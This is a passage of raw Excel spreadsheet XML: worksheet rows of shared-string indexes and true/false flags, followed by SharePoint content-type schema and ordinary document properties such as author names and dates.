      <c r="A42" s="1" t="s">
        <v>2106</v>
      </c>
      <c r="B42" s="1" t="s">
        <v>2107</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>2108</v>
      </c>
      <c r="D42" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E42" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F42" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G42" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="43" spans="1:7">
      <c r="A43" s="1" t="s">
        <v>2109</v>
      </c>
      <c r="B43" s="1" t="s">
        <v>2110</v>
      </c>
      <c r="C43" s="1" t="s">
        <v>2111</v>
      </c>
      <c r="D43" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E43" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F43" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G43" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="1:7">
      <c r="A44" s="1" t="s">
        <v>2112</v>
      </c>
      <c r="B44" s="1" t="s">
        <v>2113</v>
      </c>
      <c r="C44" s="1" t="s">
        <v>2114</v>
      </c>
      <c r="D44" s="1" t="s">
        <v>133</v>
      </c>
      <c r="E44" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F44" s="1" t="s">
        <v>134</v>
      </c>
      <c r="G44" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="45" spans="1:7">
      <c r="A45" s="1" t="s">
        <v>20</v>
      </c>
      <c r="B45" s="1" t="s">
        <v>2115</v>
      </c>
      <c r="C45" s="1" t="s">
        <v>2116</v>
      </c>
      <c r="D45" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E45" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F45" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G45" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="46" spans="1:7">
      <c r="A46" s="1" t="s">
        <v>2117</v>
      </c>
      <c r="B46" s="1" t="s">
        <v>2118</v>
      </c>
      <c r="C46" s="1" t="s">
        <v>2119</v>
      </c>
      <c r="D46" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E46" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F46" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G46" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:7">
      <c r="A47" s="1" t="s">
        <v>2120</v>
      </c>
      <c r="B47" s="1" t="s">
        <v>2121</v>
      </c>
      <c r="C47" s="1" t="s">
        <v>2122</v>
      </c>
      <c r="D47" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E47" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F47" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G47" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:7">
      <c r="A48" s="1" t="s">
        <v>2123</v>
      </c>
      <c r="B48" s="1" t="s">
        <v>2124</v>
      </c>
      <c r="C48" s="1" t="s">
        <v>2125</v>
      </c>
      <c r="D48" s="1" t="s">
        <v>133</v>
      </c>
      <c r="E48" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F48" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G48" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="49" spans="1:7">
      <c r="A49" s="1" t="s">
        <v>2126</v>
      </c>
      <c r="B49" s="1" t="s">
        <v>102</v>
      </c>
      <c r="C49" s="1" t="s">
        <v>103</v>
      </c>
      <c r="D49" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E49" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F49" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G49" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="50" spans="1:7">
      <c r="A50" s="1" t="s">
        <v>2127</v>
      </c>
      <c r="B50" s="1" t="s">
        <v>63</v>
      </c>
      <c r="C50" s="1" t="s">
        <v>2128</v>
      </c>
      <c r="D50" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E50" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F50" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G50" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="51" spans="1:7">
      <c r="A51" s="1" t="s">
        <v>21</v>
      </c>
      <c r="B51" s="1" t="s">
        <v>2129</v>
      </c>
      <c r="C51" s="1" t="s">
        <v>2130</v>
      </c>
      <c r="D51" s="1" t="s">
        <v>133</v>
      </c>
      <c r="E51" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F51" s="1" t="s">
        <v>134</v>
      </c>
      <c r="G51" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="52" spans="1:7">
      <c r="A52" s="1" t="s">
        <v>2131</v>
      </c>
      <c r="B52" s="1" t="s">
        <v>2132</v>
      </c>
      <c r="C52" s="1" t="s">
        <v>2025</v>
      </c>
      <c r="D52" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E52" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F52" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G52" s="1" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:7">
      <c r="A53" s="1" t="s">
        <v>2133</v>
      </c>
      <c r="B53" s="1" t="s">
        <v>2134</v>
      </c>
      <c r="C53" s="1" t="s">
        <v>2135</v>
      </c>
      <c r="D53" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E53" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F53" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G53" s="1" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:7">
      <c r="A54" s="1" t="s">
        <v>2136</v>
      </c>
      <c r="B54" s="1" t="s">
        <v>2137</v>
      </c>
      <c r="C54" s="1" t="s">
        <v>2138</v>
      </c>
      <c r="D54" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E54" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F54" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G54" s="1" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="55" spans="1:7">
      <c r="A55" s="1" t="s">
        <v>2139</v>
      </c>
      <c r="B55" s="1" t="s">
        <v>2140</v>
      </c>
      <c r="C55" s="1" t="s">
        <v>2141</v>
      </c>
      <c r="D55" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E55" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F55" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G55" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:7">
      <c r="A56" s="1" t="s">
        <v>2142</v>
      </c>
      <c r="B56" s="1" t="s">
        <v>111</v>
      </c>
      <c r="C56" s="1" t="s">
        <v>112</v>
      </c>
      <c r="D56" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E56" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F56" s="1" t="s">
        <v>113</v>
      </c>
      <c r="G56" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:7">
      <c r="A57" s="1" t="s">
        <v>2143</v>
      </c>
      <c r="B57" s="1" t="s">
        <v>2144</v>
      </c>
      <c r="C57" s="1" t="s">
        <v>2145</v>
      </c>
      <c r="D57" s="1" t="s">
        <v>133</v>
      </c>
      <c r="E57" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F57" s="1" t="s">
        <v>134</v>
      </c>
      <c r="G57" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:7">
      <c r="A58" s="1" t="s">
        <v>2146</v>
      </c>
      <c r="B58" s="1" t="s">
        <v>2147</v>
      </c>
      <c r="C58" s="1" t="s">
        <v>2148</v>
      </c>
      <c r="D58" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E58" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F58" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G58" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:7">
      <c r="A59" s="1" t="s">
        <v>2149</v>
      </c>
      <c r="B59" s="1" t="s">
        <v>2150</v>
      </c>
      <c r="C59" s="1" t="s">
        <v>2151</v>
      </c>
      <c r="D59" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E59" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F59" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G59" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:7">
      <c r="A60" s="1" t="s">
        <v>2152</v>
      </c>
      <c r="B60" s="1" t="s">
        <v>2153</v>
      </c>
      <c r="C60" s="1" t="s">
        <v>2154</v>
      </c>
      <c r="D60" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E60" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F60" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G60" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:7">
      <c r="A61" s="1" t="s">
        <v>2155</v>
      </c>
      <c r="B61" s="1" t="s">
        <v>2156</v>
      </c>
      <c r="C61" s="1" t="s">
        <v>2157</v>
      </c>
      <c r="D61" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E61" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F61" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G61" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="62" spans="1:7">
      <c r="A62" s="1" t="s">
        <v>2158</v>
      </c>
      <c r="B62" s="1" t="s">
        <v>2159</v>
      </c>
      <c r="C62" s="1" t="s">
        <v>2160</v>
      </c>
      <c r="D62" s="1" t="s">
        <v>133</v>
      </c>
      <c r="E62" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F62" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G62" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="63" spans="1:7">
      <c r="A63" s="1" t="s">
        <v>2161</v>
      </c>
      <c r="B63" s="1" t="s">
        <v>2162</v>
      </c>
      <c r="C63" s="1" t="s">
        <v>2163</v>
      </c>
      <c r="D63" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E63" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F63" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G63" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:7">
      <c r="A64" s="1" t="s">
        <v>2164</v>
      </c>
      <c r="B64" s="1" t="s">
        <v>2165</v>
      </c>
      <c r="C64" s="1" t="s">
        <v>2166</v>
      </c>
      <c r="D64" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E64" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F64" s="1" t="s">
        <v>113</v>
      </c>
      <c r="G64" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:7">
      <c r="A65" s="1" t="s">
        <v>2167</v>
      </c>
      <c r="B65" s="1" t="s">
        <v>2168</v>
      </c>
      <c r="C65" s="1" t="s">
        <v>2169</v>
      </c>
      <c r="D65" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E65" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F65" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G65" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:7">
      <c r="A66" s="1" t="s">
        <v>2170</v>
      </c>
      <c r="B66" s="1" t="s">
        <v>2171</v>
      </c>
      <c r="C66" s="1" t="s">
        <v>2172</v>
      </c>
      <c r="D66" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E66" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F66" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G66" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:7">
      <c r="A67" s="1" t="s">
        <v>2173</v>
      </c>
      <c r="B67" s="1" t="s">
        <v>2174</v>
      </c>
      <c r="C67" s="1" t="s">
        <v>2175</v>
      </c>
      <c r="D67" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E67" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F67" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G67" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="1:7">
      <c r="A68" s="1" t="s">
        <v>2176</v>
      </c>
      <c r="B68" s="1" t="s">
        <v>2177</v>
      </c>
      <c r="C68" s="1" t="s">
        <v>2178</v>
      </c>
      <c r="D68" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E68" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F68" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G68" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="69" spans="1:7">
      <c r="A69" s="1" t="s">
        <v>2179</v>
      </c>
      <c r="B69" s="1" t="s">
        <v>2180</v>
      </c>
      <c r="C69" s="1" t="s">
        <v>2181</v>
      </c>
      <c r="D69" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E69" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F69" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G69" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="70" spans="1:7">
      <c r="A70" s="1" t="s">
        <v>2182</v>
      </c>
      <c r="B70" s="1" t="s">
        <v>2183</v>
      </c>
      <c r="C70" s="1" t="s">
        <v>2184</v>
      </c>
      <c r="D70" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E70" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F70" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G70" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="71" spans="1:7">
      <c r="A71" s="1" t="s">
        <v>2185</v>
      </c>
      <c r="B71" s="1" t="s">
        <v>2186</v>
      </c>
      <c r="C71" s="1" t="s">
        <v>2187</v>
      </c>
      <c r="D71" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E71" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F71" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G71" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="72" spans="1:7">
      <c r="A72" s="1" t="s">
        <v>2188</v>
      </c>
      <c r="B72" s="1" t="s">
        <v>2189</v>
      </c>
      <c r="C72" s="1" t="s">
        <v>2190</v>
      </c>
      <c r="D72" s="1" t="s">
        <v>133</v>
      </c>
      <c r="E72" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F72" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G72" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="73" spans="1:7">
      <c r="A73" s="1" t="s">
        <v>2191</v>
      </c>
      <c r="B73" s="1" t="s">
        <v>2192</v>
      </c>
      <c r="C73" s="1" t="s">
        <v>2193</v>
      </c>
      <c r="D73" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E73" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F73" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G73" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="74" spans="1:7">
      <c r="A74" s="1" t="s">
        <v>2194</v>
      </c>
      <c r="B74" s="1" t="s">
        <v>2195</v>
      </c>
      <c r="C74" s="1" t="s">
        <v>2196</v>
      </c>
      <c r="D74" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E74" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F74" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G74" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="75" spans="1:7" ht="111.95">
      <c r="A75" s="1" t="s">
        <v>2197</v>
      </c>
      <c r="B75" s="1" t="s">
        <v>2198</v>
      </c>
      <c r="C75" s="9" t="s">
        <v>2199</v>
      </c>
      <c r="D75" s="1" t="s">
        <v>133</v>
      </c>
      <c r="E75" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F75" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G75" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="1:7">
      <c r="A76" s="1" t="s">
        <v>2200</v>
      </c>
      <c r="B76" s="1" t="s">
        <v>2201</v>
      </c>
      <c r="C76" s="1" t="s">
        <v>2202</v>
      </c>
      <c r="D76" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E76" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F76" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G76" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="77" spans="1:7">
      <c r="A77" s="1" t="s">
        <v>2203</v>
      </c>
      <c r="B77" s="1" t="s">
        <v>2204</v>
      </c>
      <c r="C77" s="1" t="s">
        <v>2205</v>
      </c>
      <c r="D77" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E77" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F77" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G77" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="78" spans="1:7">
      <c r="A78" s="1" t="s">
        <v>2206</v>
      </c>
      <c r="B78" s="1" t="s">
        <v>2207</v>
      </c>
      <c r="C78" s="1" t="s">
        <v>2208</v>
      </c>
      <c r="D78" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E78" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F78" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G78" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:7">
      <c r="A79" s="1" t="s">
        <v>2209</v>
      </c>
      <c r="B79" s="1" t="s">
        <v>765</v>
      </c>
      <c r="C79" s="1" t="s">
        <v>766</v>
      </c>
      <c r="D79" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E79" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F79" s="1" t="s">
        <v>113</v>
      </c>
      <c r="G79" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="80" spans="1:7">
      <c r="A80" s="1" t="s">
        <v>2210</v>
      </c>
      <c r="B80" s="1" t="s">
        <v>2211</v>
      </c>
      <c r="C80" s="1" t="s">
        <v>2212</v>
      </c>
      <c r="D80" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E80" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F80" s="1" t="s">
        <v>134</v>
      </c>
      <c r="G80" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="81" spans="1:7">
      <c r="A81" s="1" t="s">
        <v>2213</v>
      </c>
      <c r="B81" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="C81" s="1" t="s">
        <v>2215</v>
      </c>
      <c r="D81" s="1" t="s">
        <v>133</v>
      </c>
      <c r="E81" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F81" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G81" s="1" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="82" spans="1:7">
      <c r="A82" s="1" t="s">
        <v>2216</v>
      </c>
      <c r="B82" s="1" t="s">
        <v>2217</v>
      </c>
      <c r="C82" s="1" t="s">
        <v>2218</v>
      </c>
      <c r="D82" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E82" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F82" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G82" s="1" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="83" spans="1:7">
      <c r="A83" s="1" t="s">
        <v>2219</v>
      </c>
      <c r="B83" s="1" t="s">
        <v>2220</v>
      </c>
      <c r="C83" s="1" t="s">
        <v>2221</v>
      </c>
      <c r="D83" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E83" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F83" s="1" t="s">
        <v>38</v>
      </c>
      <c r="G83" s="1" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="84" spans="1:7">
      <c r="A84" s="1" t="s">
        <v>2222</v>
      </c>
      <c r="B84" s="1" t="s">
        <v>2223</v>
      </c>
      <c r="C84" s="1" t="s">
        <v>2224</v>
      </c>
      <c r="D84" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E84" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="F84" s="1" t="s">
        <v>318</v>
      </c>
      <c r="G84" s="1" t="b">
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:G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da2201d-5120-4521-9ade-78d438b6e9c1">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="6c80978e-1713-4822-8f56-dce0c69bb5c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A3009ACAB5B2543A66B53EF58285F81" ma:contentTypeVersion="16" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="d7357dd9eb3ee986970b2ff76fea7def">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="6da2201d-5120-4521-9ade-78d438b6e9c1" xmlns:ns3="6c80978e-1713-4822-8f56-dce0c69bb5c5" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="dc6d2e6c0a57126dffee02874746d782" ns2:_="" ns3:_="">
    <xsd:import namespace="6da2201d-5120-4521-9ade-78d438b6e9c1"/>
    <xsd:import namespace="6c80978e-1713-4822-8f56-dce0c69bb5c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MediaServiceObjectDetectorVersions"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a2201d-5120-4521-9ade-78d438b6e9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ccb131ac-5462-48f7-a844-3c6c4a75fc0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c80978e-1713-4822-8f56-dce0c69bb5c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b4a391ea-bf68-4a84-ab85-5adb6711c12f}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="6c80978e-1713-4822-8f56-dce0c69bb5c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F91FC04-A867-47B8-8970-8BAAD892D14E}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8C171EFC-4BC2-4BA5-85ED-5DEBA1BD18A5}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{465452CB-4E07-43F6-9C27-A6B10C368BC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 O'Brien</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Joseph Ballard</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-20T04:36:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-28T21:02:15Z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0x0101000A3009ACAB5B2543A66B53EF58285F81</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>